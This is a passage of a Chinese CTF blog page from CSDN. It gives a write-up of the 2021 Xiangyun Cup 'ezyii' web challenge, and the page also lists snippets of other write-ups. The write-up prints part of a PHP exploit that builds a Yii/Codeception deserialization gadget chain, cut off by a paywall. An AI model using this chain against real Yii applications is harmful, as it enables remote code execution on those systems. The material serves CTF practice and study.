[祥云杯2021]几道简单题的wp

最新推荐文章于 2022-11-01 15:24:27 发布
最新推荐文章于 2022-11-01 15:24:27 发布
阅读量4.3k 收藏 6
点赞数 14
分类专栏: 比赛wp 文章标签: php 安全 信息安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51078229/article/details/119840772
版权
本文详细记录了祥云杯2021中的一道安全题目,涉及PHP SSRF漏洞利用、源码泄露、信息取证等过程。通过分析题目提供的链子,利用反序列化漏洞,逐步揭示了如何通过session绕过过滤,执行系统命令获取flag,并介绍了使用volatility进行内存取证和密码破解的方法。
摘要由CSDN通过智能技术生成

ezyii

https://xz.aliyun.com/t/9948

找yii链子打,开局就给了反序列化,看了一下是文章里面的第四条链子

exp

<?php
namespace Codeception\Extension{
   
    use Faker\DefaultGenerator;
    use GuzzleHttp\Psr7\AppendStream;
    class  RunProcess{
   
        protected $output;
        private $processes = [];
        public function __construct(){
   
            $this->processes[]=new DefaultGenerator(new AppendStream());
            $this->output=new DefaultGenerator('jiang');
        }
    }
    echo base64_encode(serialize(new RunProcess()));
}

namespace Faker{
   
    class DefaultGenerator
{
   
    protected $default;

    public function __construct($default = null)
    {
   
        $this->default = $default;
}
}
}
namespace GuzzleHttp\Psr7{
   
    use Faker\DefaultGenerator;
    final class AppendStream{
   
        private $streams
最低0.47元/天 解锁文章
huamanggg
关注
专栏目录
WP-2021祥云
ce666666的博客
01-16 680
前言 好多审计,懒狗的我,自愧不如。赛后借助各位师傅的wp进行复现,不会的目赛后加强学习知识点,盲看没什么用。 链接 复现平台:https://buuoj.cn/ 参考大佬博客:https://www.anquanke.com/post/id/251221 WEB ezyii 这就是网上有的yii链子,1day好像。利用这个https://xz.aliyun.com/t/9948#toc-6直接拿。  代码 <?php namespace Codeception\Extension{ u
[祥云2021Wp]
qq_42906381的博客
08-24 413
MISC新的改变功能快捷键合理的创建标,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语
祥云2021 Web简单wp
feng的博客
08-23 601
前言 千言万语汇成一句:我真是太菜了。事实证明只会个php在卷成这样的ctf比赛里面只能挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打。 不会Java和js直接下线,只能卑微的做最简单
2021祥云web 部分wp
fmyyy1的博客
08-23 780
ezyii 说是最新的链子,目把文件都筛选好了让我们找。写一下我的思路 看到RunProcess类 <?php namespace Codeception\Extension; class RunProcess { protected $output; protected $config = ['sleep' => 0]; protected static $events = []; private $processes = []; publ
2021 祥云 RE dizzy WP
AlwaysBetter
08-28 368
这道 其实是一道模拟 作者估计也没想到 被hexRay背刺了 大概思想是模拟了 加 减 异或三种运算 可惜模拟的子片段能被hexRay识别并分析,导致把maxFunSize参数上限调高后,ida直接把运算式生成了: byte_43841C[6] += byte_43841C[3]; byte_43841C[10] -= byte_43841C[27]; byte_43841C[10] += byte_43841C[6]; byte_43841C[14] += byte_43841C[3]; byte_
祥云2021目汇总 祥云.7z
08-31
祥云2021目汇总 祥云.7z
【pwn】2021 祥云 (部分)
woodwhale的博客
10-07 4218
【pwn】2021 祥云 (部分) 前言 国庆的最后几天,一直在补,发现祥云那个时候一道堆都不会,直接开始补。 补过程中,发现自己还是太菜了,对着师傅们的wp都有些不明白.jpg 1、note 这应该是祥云里最简单目了QAQ。但是之前没有学过IO,参考一位师傅写的这篇博客,pwn堆利用的一些姿势 – IO_FILE 漏洞点在于scanf的格式化字符串,可以任意位置写。发现stack中有_IO_2_1_stdout_那么,我们写入p64(0xfbad1800) + p64(0)*3来泄露
2020祥云 CTFNu1L.pdf
03-15
根据提供的文件内容,我们可以提炼出以下几个关键知识点: 1. RAR伪加密:这是一种常见的加密方法,它通过修改文件头的方式来欺骗解压缩软件,使其认为文件已经被加密。实际上文件并没有加密,只是通过改变文件头...
2021祥云部分wp
m0_51357657的博客
08-24 898
祥云2021 目前只做了两道(没办法 tcl。。。 MISC-鸣雏恋 下载下来是个word,打开只有一句话 不太对劲,放到010里看一看发现文件头50 4B 03 04 经典压缩包了,文件后缀改成zip,解压 得到一个txt和加密压缩包,文件打开感觉什么都没有。。。 但仔细看,第二行可显示字符没有190,所以是零宽度字符隐写 vim 一下,果然 放到在线网站上解一下 压缩包解完有129488张图片,两种图片代表01,转成二进制 二进制转换成ASCII码之后,发现是个base64转png 接下
2021祥云 CTF pwn解 wp
qq_39948058的博客
08-26 1217
前言:都不难,我好气,这次被大佬带飞,队里的pwn手都是神级别的,这里出了三道,如果我不是sha,我应该能出五道,可是我好菜,这里贴出一下 note: 思路:自己构建格式化字符串漏洞,自己打,先打IO——stdout,泄露libc基地址,再打的是reallochook为onegadget,然后进行申请获取rce exp: #coding:utf-8 from pwn import * context.log_level = "debug" p = process("./note") libc =
祥云部分pwn的wp
eeeeeight的博客
08-24 1240
lemon 主要问是2.26版本下, 未控制好指针导致任意写 数据结构如下: lemon_name: lemon_content: 主要可利用的函数是color: 里的buf是指lemon_name结构, 所以可以控制指针lemon_addr的指向了, 因为只能用一次所以想控制整个tcache结构 其它一点可利用的函数: 开头的一次welcome: 虽然是有rand, 但无随机数种子, 所以是固定值, z3一把????! eat函数: 可以打印chunkaddr第四字节, 用于配合后面分配堆块 整
[ctf misc][2021祥云初赛]层层取证
ShenZ的博客
08-23 2619
呜呜写博客以来第一次线上做出目了 [2021祥云初赛]层层取证 附件: Forensic_9b23172e1dba502daa656b8d4234897f.rar 内含win7x64电脑镜像和内存镜像disk_image.rar,memdump.rar 1.初步分析 disk_image 首先取证大师 得到xiaoming用户NT密码哈希值:92efa7f9f2740956d51157f46521f941,cmd5网站在线解密(是付费的) 在xiaoming账户的桌面上可以看到叫flag.txt
一个菜鸡的祥云wp(只有签到和进制反转)
00勇士王子的博客
11-23 767
MISC 签到 看着这熟悉的编码形式,直接进行base64解码,得到flag(注意不用加=) 进制反转 目附件链接 提取码:biw9 下载附件后,是一个.rar压缩包,双击打开时,发现提示文件已损坏,打不开。 然后想到目中的“有时候还是手机好用”这句话,然后把压缩包发送到手机上,看能不能打开 用手机打开,发现rar文件里包含了一个flag.wav文件,上网查了一下, 于是想要在手机上下载这个wav文件,却发现下载不了 能看见,就是下载不了,气不气? 然后又回到电脑上,手机可以打开,电脑却报
祥云202部分wp
会下雪的晴天
12-12 631
title: 祥云202部分wp date: 2020-11-21 17:00:00 tags: CTF categories: 比赛 link:https://yq1ng.github.io/ 目录签到Commandflaskboteasygogogodoyouknowssrf 第一次比赛做出来这么多,感谢太空人师傅给的很多思路,不得不说,师傅真滴强 签到 base64解码,讲真,这才叫签到 Command %09制表符 通配符绕过,payload:?url=||ca\t%09/etc/..
【pwn】2022 祥云 部分wp
woodwhale的博客
10-31 1254
2022 祥云 pwn 部分wp,有空复现别的
2022祥云---crypto wp
最新发布
3tefanie丶zhou的博客
11-01 628
【天底下好看的女子多了去,好看就多看一两眼,悦目养眼嘛,人之常情,可为啥要心动?】
祥云2020 Crypto wp
Gm1y's Blog
11-26 1221
Crypto: SimpleRSA wiener attack 利用自定义的m检验生成的d‘来判断phi是否正确 e=10722954259441365070399386771014424812135194081251482338804428492063533796819893050005703870931522362632033957269746929598193154107811800942162091000695307914074955108826407819205647322143278980999
评论 15
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huamanggg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值